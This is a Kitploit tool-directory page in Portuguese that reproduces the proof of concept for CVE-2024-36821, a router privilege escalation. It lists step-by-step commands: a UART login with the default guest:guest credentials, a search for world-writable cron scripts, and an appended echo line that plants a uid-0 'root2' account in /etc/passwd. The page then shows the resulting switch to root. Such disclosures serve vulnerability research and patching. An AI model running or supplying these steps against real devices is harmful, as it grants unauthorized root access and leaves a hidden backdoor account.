Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-36821 — A referência pública que contém as informações mínimas necessárias para a vulnerabilidade coberta pelo CVE-2024-36821 | Kitploit
Ferramentas/GitHubGitHub/ivanglinkin/cve-2024-36821
Segurança de Sistemas EmbarcadosEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de Hardware e IoT
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

A referência pública que contém as informações mínimas necessárias para a vulnerabilidade coberta pelo CVE-2024-36821

Ver Repositório
32há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-36821

A referência pública que contém as informações mínimas necessárias para a vulnerabilidade coberta pela CVE-2024-36821

O vídeo original com PoC pode ser encontrado neste vídeo -> https://www.youtube.com/watch?v=6vHno0ik7JY

O PoC:

  1. Conecte-se ao roteador através da conexão UART

  2. Usando as credenciais guest:guest, faça login no sistema

  3. Usando o comando find / -perm -777 -type f 2>/dev/null, encontre arquivos com permissões de leitura, escrita e execução:

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    Screenshot 2024-06-10 at 20 00 50
  4. Verifique o proprietário com o comando ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh

  5. Gere a senha com o comando openssl passwd Abracadabra

  6. Edite /tmp/cron/cron.everyminute/conntrack_collector.sh, adicionando ao final a nova senha gerada:

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    Screenshot 2024-06-10 at 20 05 05
  7. Aguarde um minuto

  8. Troque para o usuário root2 com o próximo comando

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
Baixar ferramenta